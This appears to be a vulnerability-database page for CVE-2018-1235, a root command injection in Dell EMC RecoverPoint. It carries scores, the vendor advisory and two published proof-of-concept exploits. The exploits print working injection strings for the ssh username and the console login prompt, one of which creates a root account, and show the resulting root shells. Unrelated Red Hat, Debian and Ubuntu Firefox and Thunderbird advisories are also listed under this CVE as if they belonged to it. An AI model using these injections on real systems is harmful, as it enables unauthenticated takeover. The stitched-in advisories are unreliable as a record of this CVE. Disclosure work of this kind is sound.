CVE-2018-1235
CVSS 10.0
Published: 2018-05-29 13:29:00
Last revised: 2018-06-29 14:49:41

[Original] Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.


[CNNVD] CNNVD data is not yet available.


[Machine translation] Translation not yet available.

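- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a total shutdown of the system]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: NETWORK [the attacker needs neither internal network access nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-77 [Improper neutralization of special elements used in a command (command injection)]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found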

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1235
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1235
(Official data source) NVD

- Other links and resources

http://seclists.org/fulldisclosure/2018/May/61
(VENDOR_ADVISORY)  FULLDISC  20180522 DSA-2018-095: Dell EMC RecoverPoint Multiple Vulnerabilities
http://www.securityfocus.com/bid/104246
(VENDOR_ADVISORY)  BID  104246
https://www.exploit-db.com/exploits/44920/
(VENDOR_ADVISORY)  EXPLOIT-DB  44920

- Vulnerability information (F147925)

Dell EMC RecoverPoint Command Injection / LDAP Password Leak / File Read (PacketStormID:F147925)
2018-05-28 00:00:00
Paul Taylor  emc.com
advisory,arbitrary,vulnerability
CVE-2018-1235,CVE-2018-1241,CVE-2018-1242

Dell EMC RecoverPoint versions prior to 5.1.2 and Dell EMC RecoverPoint Virtual Machine (VM) versions prior to 5.1.1.3 suffer from command injection, LDAP password leak, and arbitrary file read vulnerabilities.


DSA-2018-095: Dell EMC RecoverPoint Multiple Vulnerabilities

EMC Identifier:	DSA-2018-095

CVE Identifier: CVE-2018-1235, CVE-2018-1241, CVE-2018-1242

Severity Rating: CVSS Base Score: See below for CVSSv3 Scores.

Affected products: 
Dell EMC RecoverPoint versions prior to 5.1.2
Dell EMC RecoverPoint Virtual Machine (VM) versions prior to 5.1.1.3

Summary:  
Dell EMC RecoverPoint addresses multiple security vulnerabilities which may potentially be exploited by malicious users to compromise the affected system.

Details:
Unauthenticated Command Injection Vulnerability

CVE-2018-1235

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.

CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

LDAP Password Disclosure Vulnerability

CVE-2018-1241

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, under certain conditions, may leak LDAP password in plain-text into the RecoverPoint log file. An authenticated malicious user with access to the RecoverPoint log files may obtain the exposed LDAP password to use it in further attacks.

CVSSv3 Base Score: 6.1 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N)

Authenticated Arbitrary File Read Vulnerability

CVE-2018-1242

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability in the Boxmgmt CLI. An authenticated malicious user with boxmgmt privileges may potentially exploit this vulnerability to read RPA files. Note that files that require root permission cannot be read.

CVSSv3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Resolution:	
The following Dell EMC RecoverPoint releases address these vulnerabilities:

Dell EMC RecoverPoint for Virtual Machines 5.1.1.3 and later

Dell EMC RecoverPoint 5.1.2 and later

Dell EMC recommends all customers upgrade at the earliest opportunity. In addition, to fully mitigate CVE-2018-1241, customers are recommended to change their LDAP passwords.

Note: It is a security best practice to change any default system passwords to strong and unique values. Refer to RecoverPoint Security Configuration Guide for details. Refer to Dell EMC Knowledge Base Article 520937 for instructions on how to change default root password in RecoverPoint systems.

Link To Remedies:	
Customers can download software from EMC Online Support at https://support.emc.com/search/?text=RecoverPoint&searchLang=en_US&facetResource=DOWN

Credits:
Dell EMC would like to thank Paul Taylor (@bao7uo) from Foregenix Ltd for reporting these vulnerabilities.

Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from 
the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical 
Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers 
take into account both the base score and any relevant temporal and environmental scores which may impact the potential 
severity associated with particular security vulnerability.

EMC recommends that all users determine the applicability of this information to their individual situations and take 
appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of merchantability, fitness for a particular 
purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of 
liability for consequential or incidental damages, so the foregoing limitation may not apply.


    

- Vulnerability information (F148269)

Dell EMC RecoverPoint Local Root Command Execution (PacketStormID:F148269)
2018-06-21 00:00:00
Paul Taylor  
exploit,local,root
CVE-2018-1235

Dell EMC RecoverPoint versions prior to 5.1.2 suffer from a local root command execution vulnerability.

# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
# Date: 2018-06-21
# Exploit Author: Paul Taylor
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
  
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access 
# via tty console login.
  
# 2. Proof of Concept
# Inject into local tty console login prompt
 
recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#

    

- Vulnerability information (F148265)

Dell EMC RecoverPoint Remote Root (PacketStormID:F148265)
2018-06-21 00:00:00
Paul Taylor  
exploit,remote,root
CVE-2018-1235

Dell EMC RecoverPoint versions prior to 5.1.2 suffer from a remote root command execution vulnerability.

# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
# Date: 2018-06-21
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Exploit Author: Paul Taylor
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
  
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access via 
# the ssh service.
  
# 2. Proof of Concept
# Inject into ssh username.
# N.B. combined length of new username+password is limited to 21 due to injection length limitations
 
$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh bao7uo@192.168.57.3
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#


    

- Vulnerability information (F148355)

Red Hat Security Advisory 2018-2112-01 (PacketStormID:F148355)
2018-06-29 00:00:00
Red Hat  
advisory,web,overflow,vulnerability,csrf
linux,redhat
CVE-2017-7762,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156,CVE-2018-5188,CVE-2018-6126

Red Hat Security Advisory 2018-2112-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 60.1.0 ESR. Issues addressed include buffer overflow, cross site request forgery, and use-after-free vulnerabilities.


=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2018:2112-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:2112
Issue date:        2018-06-28
CVE Names:         CVE-2017-7762 CVE-2018-5156 CVE-2018-5188 
                   CVE-2018-6126 CVE-2018-12359 CVE-2018-12360 
                   CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 
                   CVE-2018-12365 CVE-2018-12366 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards
compliance, performance, and portability.

This update upgrades Firefox to version 60.1.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and
Firefox ESR 52.9 (CVE-2018-5188)

* Mozilla: Buffer overflow using computed size of canvas element
(CVE-2018-12359)

* Mozilla: Use-after-free using focus() (CVE-2018-12360)

* Mozilla: Media recorder segmentation fault when track type is changed
during capture (CVE-2018-5156)

* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)

* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)

* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)

* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
(CVE-2018-12364)

* Mozilla: address bar username and password spoofing in reader mode
(CVE-2017-7762)

* Mozilla: Compromised IPC child process can list local filenames
(CVE-2018-12365)

* Mozilla: Invalid data handling during QCMS transformations
(CVE-2018-12366)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason
Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous,
Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the
original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1584035 - CVE-2018-6126 Skia: Heap buffer overflow rasterizing paths in SVG
1590493 - CVE-2017-7762 Mozilla: address bar username and password spoofing in reader mode
1595024 - CVE-2018-12359 Mozilla: Buffer overflow using computed size of canvas element
1595025 - CVE-2018-12360 Mozilla: Use-after-free using focus()
1595027 - CVE-2018-12362 Mozilla: Integer overflow in SSSE3 scaler
1595028 - CVE-2018-12363 Mozilla: Use-after-free when appending DOM nodes
1595029 - CVE-2018-12364 Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
1595030 - CVE-2018-12365 Mozilla: Compromised IPC child process can list local filenames
1595031 - CVE-2018-12366 Mozilla: Invalid data handling during QCMS transformations
1595037 - CVE-2018-5156 Mozilla: Media recorder segmentation fault when track type is changed during capture
1595040 - CVE-2018-5188 Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9

6. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

ppc64:
firefox-60.1.0-5.el6.ppc64.rpm
firefox-debuginfo-60.1.0-5.el6.ppc64.rpm

s390x:
firefox-60.1.0-5.el6.s390x.rpm
firefox-debuginfo-60.1.0-5.el6.s390x.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-7762
https://access.redhat.com/security/cve/CVE-2018-5156
https://access.redhat.com/security/cve/CVE-2018-5188
https://access.redhat.com/security/cve/CVE-2018-6126
https://access.redhat.com/security/cve/CVE-2018-12359
https://access.redhat.com/security/cve/CVE-2018-12360
https://access.redhat.com/security/cve/CVE-2018-12362
https://access.redhat.com/security/cve/CVE-2018-12363
https://access.redhat.com/security/cve/CVE-2018-12364
https://access.redhat.com/security/cve/CVE-2018-12365
https://access.redhat.com/security/cve/CVE-2018-12366
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/advisories/mfsa2018-16/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- Vulnerability information (F148354)

Red Hat Security Advisory 2018-2113-01 (PacketStormID:F148354)
2018-06-29 00:00:00
Red Hat  
advisory,web,overflow,vulnerability,csrf
linux,redhat
CVE-2017-7762,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156,CVE-2018-5188,CVE-2018-6126

Red Hat Security Advisory 2018-2113-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 60.1.0 ESR. Issues addressed include buffer overflow, cross site request forgery, and use-after-free vulnerabilities.


=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2018:2113-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:2113
Issue date:        2018-06-28
CVE Names:         CVE-2017-7762 CVE-2018-5156 CVE-2018-5188 
                   CVE-2018-6126 CVE-2018-12359 CVE-2018-12360 
                   CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 
                   CVE-2018-12365 CVE-2018-12366 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards
compliance, performance, and portability.

This update upgrades Firefox to version 60.1.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and
Firefox ESR 52.9 (CVE-2018-5188)

* Mozilla: Buffer overflow using computed size of canvas element
(CVE-2018-12359)

* Mozilla: Use-after-free using focus() (CVE-2018-12360)

* Mozilla: Media recorder segmentation fault when track type is changed
during capture (CVE-2018-5156)

* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)

* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)

* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)

* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
(CVE-2018-12364)

* Mozilla: address bar username and password spoofing in reader mode
(CVE-2017-7762)

* Mozilla: Compromised IPC child process can list local filenames
(CVE-2018-12365)

* Mozilla: Invalid data handling during QCMS transformations
(CVE-2018-12366)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason
Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous,
Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the
original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1584035 - CVE-2018-6126 Skia: Heap buffer overflow rasterizing paths in SVG
1590493 - CVE-2017-7762 Mozilla: address bar username and password spoofing in reader mode
1595024 - CVE-2018-12359 Mozilla: Buffer overflow using computed size of canvas element
1595025 - CVE-2018-12360 Mozilla: Use-after-free using focus()
1595027 - CVE-2018-12362 Mozilla: Integer overflow in SSSE3 scaler
1595028 - CVE-2018-12363 Mozilla: Use-after-free when appending DOM nodes
1595029 - CVE-2018-12364 Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
1595030 - CVE-2018-12365 Mozilla: Compromised IPC child process can list local filenames
1595031 - CVE-2018-12366 Mozilla: Invalid data handling during QCMS transformations
1595037 - CVE-2018-5156 Mozilla: Media recorder segmentation fault when track type is changed during capture
1595040 - CVE-2018-5188 Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

ppc64:
firefox-60.1.0-4.el7_5.ppc64.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64.rpm

ppc64le:
firefox-60.1.0-4.el7_5.ppc64le.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64le.rpm

s390x:
firefox-60.1.0-4.el7_5.s390x.rpm
firefox-debuginfo-60.1.0-4.el7_5.s390x.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

aarch64:
firefox-60.1.0-4.el7_5.aarch64.rpm
firefox-debuginfo-60.1.0-4.el7_5.aarch64.rpm

ppc64le:
firefox-60.1.0-4.el7_5.ppc64le.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64le.rpm

s390x:
firefox-60.1.0-4.el7_5.s390x.rpm
firefox-debuginfo-60.1.0-4.el7_5.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-7762
https://access.redhat.com/security/cve/CVE-2018-5156
https://access.redhat.com/security/cve/CVE-2018-5188
https://access.redhat.com/security/cve/CVE-2018-6126
https://access.redhat.com/security/cve/CVE-2018-12359
https://access.redhat.com/security/cve/CVE-2018-12360
https://access.redhat.com/security/cve/CVE-2018-12362
https://access.redhat.com/security/cve/CVE-2018-12363
https://access.redhat.com/security/cve/CVE-2018-12364
https://access.redhat.com/security/cve/CVE-2018-12365
https://access.redhat.com/security/cve/CVE-2018-12366
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/advisories/mfsa2018-16/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- Vulnerability information (F148353)

Debian Security Advisory 4235-1 (PacketStormID:F148353)
2018-06-29 00:00:00
Debian  debian.org
advisory,web,denial of service,arbitrary,info disclosure,csrf
linux,debian
CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156

Debian Linux Security Advisory 4235-1 - Several security issues have been found in the Mozilla Firefox web browser: Multiple memory safety errors and other implementation errors may lead to the execution of arbitrary code, denial of service, cross-site request forgery or information disclosure.


-------------------------------------------------------------------------
Debian Security Advisory DSA-4235-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
June 27, 2018                         https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-5156 CVE-2018-12359 CVE-2018-12360 CVE-2018-12362 
                 CVE-2018-12363 CVE-2018-12364 CVE-2018-12365 CVE-2018-12366

Several security issues have been found in the Mozilla Firefox web
browser: Multiple memory safety errors and other implementation errors may
lead to the execution of arbitrary code, denial of service, cross-site
request forgery or information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 52.9.0esr-1~deb9u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
    

- Vulnerability information (F148442)

Ubuntu Security Notice USN-3705-1 (PacketStormID:F148442)
2018-07-05 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2018-12358,CVE-2018-12359,CVE-2018-12360,CVE-2018-12361,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-12367,CVE-2018-12369,CVE-2018-12370,CVE-2018-12371,CVE-2018-5156,CVE-2018-5186,CVE-2018-5187,CVE-2018-5188

Ubuntu Security Notice 3705-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, read uninitialized memory, bypass same-origin restrictions, bypass CORS restrictions, bypass CSRF protections, obtain sensitive information, or execute arbitrary code. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3705-1
July 05, 2018

firefox vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS
- Ubuntu 17.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS

Summary:

Firefox could be made to crash or run programs as your login if it
opened a malicious website.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

Multiple security issues were discovered in Firefox. If a user were
tricked into opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service, read uninitialized
memory, bypass same-origin restrictions, bypass CORS restrictions,
bypass CSRF protections, obtain sensitive information, or execute
arbitrary code. (CVE-2018-5156, CVE-2018-5186, CVE-2018-5187,
CVE-2018-5188, CVE-2018-12358, CVE-2018-12359, CVE-2018-12360,
CVE-2018-12361, CVE-2018-12362, CVE-2018-12363, CVE-2018-12364,
CVE-2018-12365, CVE-2018-12366, CVE-2018-12367, CVE-2018-12370,
CVE-2018-12371)

A security issue was discovered with WebExtensions. If a user were
tricked into installing a specially crafted extension, an attacker
could potentially exploit this to obtain full browser permissions.
(CVE-2018-12369)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 18.04 LTS:
  firefox                         61.0+build3-0ubuntu0.18.04.1

Ubuntu 17.10:
  firefox                         61.0+build3-0ubuntu0.17.10.1

Ubuntu 16.04 LTS:
  firefox                         61.0+build3-0ubuntu0.16.04.2

Ubuntu 14.04 LTS:
  firefox                         61.0+build3-0ubuntu0.14.04.2

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  https://usn.ubuntu.com/usn/usn-3705-1
  CVE-2018-12358, CVE-2018-12359, CVE-2018-12360, CVE-2018-12361,
  CVE-2018-12362, CVE-2018-12363, CVE-2018-12364, CVE-2018-12365,
  CVE-2018-12366, CVE-2018-12367, CVE-2018-12369, CVE-2018-12370,
  CVE-2018-12371, CVE-2018-5156, CVE-2018-5186, CVE-2018-5187,
  CVE-2018-5188

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.18.04.1
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.17.10.1
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.16.04.2
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.14.04.2


    

- Vulnerability information (F148526)

Ubuntu Security Notice USN-3714-1 (PacketStormID:F148526)
2018-07-12 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2018-12359,CVE-2018-12363,CVE-2018-12364,CVE-2018-12372,CVE-2018-12373,CVE-2018-12374

Ubuntu Security Notice 3714-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, bypass CORS restrictions, obtain sensitive information, or execute arbitrary code. It was discovered that S/MIME and PGP decryption oracles can be built with HTML emails. An attacker could potentially exploit this to obtain sensitive information. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3714-1
July 12, 2018

thunderbird vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS
- Ubuntu 17.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple security issues were discovered in Thunderbird. If a user were
tricked into opening a specially crafted website in a browsing context,
an attacker could potentially exploit these to cause a denial of service,
bypass CORS restrictions, obtain sensitive information, or execute
arbitrary code. (CVE-2018-12359, CVE-2018-12360, CVE-2018-12362,
CVE-2018-12363, CVE-2018-12364, CVE-2018-12365, CVE-2018-12366)

It was discovered that S/MIME and PGP decryption oracles can be built with
HTML emails. An attacker could potentially exploit this to obtain
sensitive information. (CVE-2018-12372)

It was discovered that S/MIME plaintext can be leaked through HTML
reply/forward. An attacker could potentially exploit this to obtain
sensitive information. (CVE-2018-12373)

It was discovered that forms can be used to exfiltrate encrypted mail
parts by pressing enter in a form field. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2018-12374)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 18.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.18.04.1

Ubuntu 17.10:
  thunderbird                     1:52.9.1+build3-0ubuntu0.17.10.1

Ubuntu 16.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.14.04.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

References:
  https://usn.ubuntu.com/usn/usn-3714-1
